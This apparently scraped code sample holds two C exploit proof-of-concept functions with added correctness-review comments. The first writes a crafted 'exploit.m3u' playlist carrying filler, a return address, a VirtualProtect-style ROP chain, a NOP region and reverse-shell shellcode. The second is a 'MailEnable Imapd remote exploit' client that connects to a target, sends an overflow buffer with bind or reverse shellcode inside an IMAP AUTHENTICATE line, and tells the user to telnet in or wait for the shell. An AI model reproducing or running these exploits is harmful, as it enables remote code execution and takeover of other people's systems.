/*
 * file(): write the crafted playlist "exploit.m3u" used by this
 * proof-of-concept.
 *
 * The function fills buf with gen_random(), then overwrites a run of
 * fixed 4-byte slots starting at eip_offset (RET, instr1..instr12 and the
 * words virtualprotect/retaddr/lpaddr/sz/flnprot, whose names look like a
 * VirtualProtect call frame — inferred from the names only), lays down a
 * 300-byte 0x90 region, copies reverse_sc at eip_offset+344, and finally
 * writes HEAD, URL and buf to the file.
 *
 * Everything referenced here but not declared here (eip_offset, RET,
 * instr1..instr12, virtualprotect, retaddr, lpaddr, sz, flnprot,
 * reverse_sc, HEAD, URL, gen_random, make_reverseshell, error_handle) is
 * defined elsewhere in the file.
 *
 * Review notes (C correctness, not behaviour changes):
 *  - error_handle() is not visible; if it returns, f is NULL and every
 *    fwrite()/fclose() below is undefined behaviour.
 *  - strlen(buf) is used as the write length although buf holds binary
 *    data; the write stops at the first 0x00 byte and depends on
 *    gen_random() leaving a terminator somewhere in buf (not visible).
 *  - No return value of fwrite()/fclose() is checked.
 */
void file()
    { FILE* f=fopen("exploit.m3u","wb");
      unsigned char buf[100001];
	   
    if(!f) 
	  error_handle();
	/* presumably fills reverse_sc for the given host/port — defined elsewhere */
	make_reverseshell("127.0.0.1","2010");//change here with what you want...
	/* fills the first 26117 bytes of buf; whether it NUL-terminates is not visible here */
	gen_random(buf,26117);  
	
	/* fixed 4-byte slots relative to eip_offset; buf is 100001 bytes, so the
	 * writes below stay in bounds only while eip_offset + 344 + strlen(reverse_sc)
	 * fits — eip_offset is defined elsewhere */
	memcpy(buf+eip_offset,RET,4);
	memcpy(buf+eip_offset+4,"aaaa",4);
	memcpy(buf+eip_offset+8,instr1,4);
	memcpy(buf+eip_offset+12,instr2,4);
	memcpy(buf+eip_offset+16,"bbbb",4);
	memcpy(buf+eip_offset+20,instr3,4);
	memcpy(buf+eip_offset+24,virtualprotect,4);
	memcpy(buf+eip_offset+28,retaddr,4);
	memcpy(buf+eip_offset+32,lpaddr,4);
	memcpy(buf+eip_offset+36,sz,4);
	memcpy(buf+eip_offset+40,flnprot,4);
	
	/* 300 bytes of 0x90, then selected 4-byte slots inside that region are
	 * overwritten with instr4..instr12 at the offsets below */
	memset(buf+eip_offset+44,0x90,300);
	memcpy(buf+eip_offset+68,instr5,4);
	memcpy(buf+eip_offset+72,instr4,4);
	memcpy(buf+eip_offset+84,instr6,4);
	memcpy(buf+eip_offset+92,instr7,4);
	memcpy(buf+eip_offset+96,instr4,4);
	
    memcpy(buf+eip_offset+104,instr8,4);	
	memcpy(buf+eip_offset+108,instr8,4);
	memcpy(buf+eip_offset+112,instr8,4);
	memcpy(buf+eip_offset+116,instr8,4);
	
	memcpy(buf+eip_offset+120,instr6,4);
	memcpy(buf+eip_offset+128,instr7,4);
	memcpy(buf+eip_offset+132,instr9,4);
	
	memcpy(buf+eip_offset+136,instr4,4);
	memcpy(buf+eip_offset+144,instr4,4);
	memcpy(buf+eip_offset+152,instr4,4);
	
	memcpy(buf+eip_offset+160,instr8,4);	
	memcpy(buf+eip_offset+164,instr8,4);
	memcpy(buf+eip_offset+168,instr8,4);
	memcpy(buf+eip_offset+172,instr8,4);
	
	memcpy(buf+eip_offset+176,instr6,4);
	memcpy(buf+eip_offset+184,instr7,4);
	memcpy(buf+eip_offset+188,instr9,4);
	
	memcpy(buf+eip_offset+192,instr10,4);
	
	memcpy(buf+eip_offset+196,instr8,4);	
	memcpy(buf+eip_offset+200,instr8,4);
	memcpy(buf+eip_offset+204,instr8,4);
	memcpy(buf+eip_offset+208,instr8,4);
	
	memcpy(buf+eip_offset+212,instr6,4);
	memcpy(buf+eip_offset+220,instr11,4);
	memcpy(buf+eip_offset+224,instr11,4);
	memcpy(buf+eip_offset+228,instr12,4);
	
	/* copies reverse_sc without its terminator; assumes reverse_sc is a NUL-terminated C string */
	memcpy(buf+eip_offset+344,reverse_sc,strlen(reverse_sc));//change here shellcode
	
	/* NOTE(review): return values unchecked; strlen(buf) stops at the first 0x00 byte */
	fwrite(HEAD,sizeof(char),strlen(HEAD),f);
	fwrite(URL,sizeof(char),strlen(URL),f);
	fwrite(buf,sizeof(char),strlen(buf),f);
		
	/* fclose() result unchecked — a failed flush goes unnoticed */
	fclose(f);
    }
Example #2
/*
 * Entry point of the MailEnable IMAP proof-of-concept client.
 *
 * Command line (getopt "h:p:t:b:r:"):
 *   -h host    remote host (required; help() is called when missing)
 *   -p port    remote port, default 143, must be 1..65535
 *   -t index   index into targets[] (1337 is accepted unconditionally)
 *   -b port    local port, default 7320, must be 1..65535; also saved as cbport
 *   -r host    if given, make_reverseshell(lhost, cbport) is used instead of
 *              make_bindshell(lport)
 *
 * Flow: resolve host, connect with a TCP socket, build evilbuf from the
 * selected targets[] entry plus the generated shellcode array, send it as
 * an "A001 AUTHENTICATE" line and read one reply.
 *
 * Returns 0 on every path except an invalid port (returns 1). Whether
 * help() returns or exits is not visible in this file.
 *
 * Review notes (C correctness):
 *  - gethostbyname() may return NULL; he->h_addr is dereferenced unchecked.
 *  - socket() and malloc() results are never checked; request is never freed.
 *  - cbport is only assigned under -b, so -r without -b passes an
 *    uninitialised pointer to make_reverseshell().
 *  - sizeof(portbind_sc)/sizeof(reverse_sc) only give the payload length if
 *    those are arrays declared in this file, not char pointers.
 *  - target == 1337 skips the range check and still indexes targets[].
 */
int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
    long addr;
    unsigned short port;
    unsigned long ip;
    int sockfd, buff,rc,opt,i;
    int target=0,rport=143,lport=7320;
    char *host=NULL,*lhost=NULL,*cbport;
    char evilbuf[2048];
    char buffer[1024];
    char *request;
    /* fewer than two option/value pairs: print usage and stop */
    if(argc < 3 ) {
	help(argv[0]);
	exit(0);
    }
    while ((opt = getopt (argc, argv, "h:p:t:b:r:")) != -1){
          switch (opt){
	        case 'h':
	            host = optarg;
	            break;
	        case 'p':
                /* atoi() yields 0 for non-numeric input; the range check rejects it */
                rport = atoi(optarg);
                if(rport > 65535 || rport < 1){
                    printf("[-] Port %d is invalid\n",rport);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                /* count targets[] entries (terminated by a NULL platform) */
                for(i = 0; targets[i].platform; i++);
                /* NOTE(review): execution continues after help() unless help() exits */
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?\n");
                    help(argv[0]);
                }
                break;
            case 'b':
                lport = atoi(optarg);
                /* cbport keeps the textual port for make_reverseshell(); unset without -b */
                cbport = optarg;
                if(lport > 65535 || lport < 1){
                    printf("[-] Port %d is invalid\n",lport);
                    return 1;
                }
                break;
            case 'r':
                lhost = optarg;
                break;
            default:
                help(argv[0]);
        }
    }
    
    /* -h is mandatory; see note above about help() possibly returning */
    if(host == NULL)
        help(argv[0]);

    printf("\n\n-=[ MailEnable Imapd remote exploit ::: Coded by Expanders ]=-\n");
    /* NOTE(review): NULL on resolution failure, dereferenced below without a check */
    he = gethostbyname(host);
    /* socket() and malloc() results unchecked; request (12344 bytes) is never freed */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(rport);
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
    /* target may be 1337 here (accepted above without a bounds check) */
    printf("\n\n[-] Targeting: %s\n",targets[target].platform);
    if ( lhost != NULL )
       printf("[-] Reverse Shell on %s:%d\n\n",lhost,lport);
    else
       printf("[-] Bind Shell on %s:%d\n\n",host,lport);
    printf("[-]Connecting to target   \t...");
    rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if(rc==0) {
              printf("[Done]\n[-]Building evil buffer   \t...");
              /* evilbuf layout: 1016 filler bytes, then fixed 4-byte words from the
               * selected targets[] entry at 1016/1022/1026, four 0x90 bytes at 1030,
               * and the shellcode array at 1034 */
              memset(evilbuf,'A',1016);
              memcpy(evilbuf+1016,targets[target].ecxloc,4);;
              memset(evilbuf+1020,'A',2);
              memcpy(evilbuf+1022,targets[target].ecxloc,4);
              memcpy(evilbuf+1026,targets[target].retloc,4);
              memset(evilbuf+1030,0x90,4);
              /* sizeof, not strlen: assumes portbind_sc / reverse_sc are arrays whose
               * size includes the terminating NUL that sprintf() below relies on */
              if ( lhost == NULL) {
                 make_bindshell(lport);
                 memcpy(evilbuf+1034,portbind_sc,sizeof(portbind_sc));
              } else {
                /* cbport is uninitialised when -r is given without -b */
                make_reverseshell(lhost,cbport);
                memcpy(evilbuf+1034,reverse_sc,sizeof(reverse_sc));
              }
              printf("[Done]\n[-]Sending evil request   \t...");
              /* evilbuf is treated as a C string here; its terminator comes from the copied array */
              sprintf(request,"A001 AUTHENTICATE %s\r\n",evilbuf);
              /* send()/recv() results unchecked; buff is assigned but never read */
              send(sockfd,request,strlen(request),0);
              buff=recv(sockfd, buffer, 256, 0);
              if ( lhost == NULL)
                 printf("[Done]\n\n[------Now-telnet-(%s %d)------]\n\n",host,lport);
              else
                 printf("[Done]\n\n[------Now-wait-reverse-on-port-%d------]\n\n",lport);
    }
    else
              printf("[Fail] -> Unable to connect\n\n");
    close(sockfd);
    return 0;
}